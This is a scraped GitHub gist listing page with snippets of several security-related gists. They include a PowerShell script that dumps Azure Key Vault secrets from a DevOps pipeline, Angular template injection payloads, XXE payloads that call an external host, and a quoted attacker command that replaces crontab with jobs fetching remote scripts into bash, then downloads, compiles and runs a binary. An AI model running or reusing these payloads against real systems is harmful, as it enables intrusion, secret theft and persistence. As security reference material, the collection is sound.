Skip to content

Instantly share code, notes, and snippets.

View mccabe615's full-sized avatar

Mike McCabe mccabe615

62 followers · 34 following
View GitHub Profile
@Flangvik
Flangvik / DumpKeyVaultDevOps.ps1
Last active July 21, 2023 13:07
#Somewhat stolen from PowerZure Get-AzureKeyVaultContent and Show-AzureKeyVaultContent , thanks hausec!
#reimplemented by Flangvik to run in a single "Azure PowerShell" Agent job, inside an DevOps Pipeline
#Suppress warnings for clean output
Set-Item Env:\SuppressAzurePowerShellBreakingChangeWarnings "true"
#Get all Azure KeyVaults from currently selected/scoped subscription
#This connection is known as an "Service connection",and in terms of accessing Azure resources, uses either Service principal or Managed identity
$vaults = Get-AzKeyVault
@liamosaur
liamosaur / foxyproxy.json
Created June 3, 2019 05:16
{
"mode": "patterns",
"proxySettings": [
{
"address": "127.0.0.1",
"port": 8080,
"username": "",
"password": "",
"type": 1,
"title": "127.0.0.1:8080",
@shortjared
shortjared / list.txt
Last active May 6, 2024 17:16
List of AWS Service Principals
a4b.amazonaws.com
access-analyzer.amazonaws.com
account.amazonaws.com
acm-pca.amazonaws.com
acm.amazonaws.com
airflow-env.amazonaws.com
airflow.amazonaws.com
alexa-appkit.amazon.com
alexa-connectedhome.amazon.com
amazonmq.amazonaws.com
@mccabe615
mccabe615 / .eslintrc
Created March 31, 2017 18:33
eslint security config
{
"plugins": ["security"],
"env": {
"node": true,
"es6": true
},
"rules": {
'security/detect-unsafe-regex': 1,
'security/detect-non-literal-regexp': 1,
'security/detect-non-literal-require': 1,
@mccabe615
mccabe615 / AngularTI.md
Last active April 18, 2024 11:37
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@WebReflection
WebReflection / certificate.sh
Last active July 1, 2020 18:08
A basic Self Signed SSL Certificate utility
#!/usr/bin/env bash
# A basic Self Signed SSL Certificate utility
# by Andrea Giammarchi @WebReflection
# https://www.webreflection.co.uk/blog/2015/08/08/bringing-ssl-to-your-private-network
# # to make it executable and use it
# $ chmod +x certificate
# $ ./certificate # to read the how-to
@atcuno
atcuno / gist:3425484ac5cce5298932
Last active March 25, 2024 13:55
HowTo: Privacy & Security Conscious Browsing

The purpose of this document is to make recommendations on how to browse in a privacy and security conscious manner. This information is compiled from a number of sources, which are referenced throughout the document, as well as my own experiences with the described technologies.

I welcome contributions and comments on the information contained. Please see the How to Contribute section for information on contributing your own knowledge.

Table of Contents

@staaldraad
staaldraad / XXE_payloads
Last active May 8, 2024 01:23
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@kevin-smets
kevin-smets / iterm2-solarized.md
Last active May 7, 2024 09:29
iTerm2 + Oh My Zsh + Solarized color scheme + Source Code Pro Powerline + Font Awesome + [Powerlevel10k] - (macOS)

Default

Default

Powerlevel10k

Powerlevel10k

@ismasan
ismasan / gist:5647955
Created May 25, 2013 04:55
Some asshole tried to access my servers and run this (they couldn't)
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k